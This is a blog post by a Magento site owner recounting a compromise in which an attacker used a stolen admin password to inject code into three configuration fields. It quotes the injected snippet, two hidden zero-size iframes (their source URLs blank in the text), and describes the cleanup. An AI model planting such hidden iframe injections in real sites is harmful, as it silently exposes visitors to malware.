Magento site was compromised

It was my first time to see a hacker is close to me.

I was flooded with notification emails from Google Adsense subjected “Your AdSense Publisher Policy Violation Report” from yesterday afternoon. I immediately tried to visit either or to see what was going on. I got a scary warning message saying either site contains malware by Chrome and Firefox (on desktop. Chrome for Android does not do safe browsing check. I don’t know if Firefox does so.)

It took me a while to find out which site contains malware. As was using AdSense but wasn’t, at first I thought it was that were hacked. was powered by WordPress, so I went through all the plugins and compared with my other WordPress sites, I didn’t find a suspicious plugin.

Then I started to look into the main domain site, which was installed with Magento. It took me quite a while for me to know there was a good tool from to check what malware was on the site.

Then it took me another while to find out how the hacker did it. Basically the hacker compromised one of admin’s (not mine) password, and add the following code in three places (design/footer/copyright, design/head/includes, design/footer/absolute_footer) in Magento System >> Configuration.

<iframe src=”″ frameborder=”0″ width=”0″ height=”0″></iframe><iframe src=”″ frameborder=”0″ width=”0″ height=”0″></iframe> and are malware sites. And if a site links to them, it is regarded as malware site as well. 

When I disabled access of compromised admin accounts (without removing the injected code), I found Chrome and Firefox stopped giving that scary warnings, and visits to or are redirected to Google. I don’t understand how Google can take control of these domains so quick, but anyway, it is not my business.

At last I removed all malware codes and requested AdSense a review of

Leave a comment

Your email address will not be published. Required fields are marked *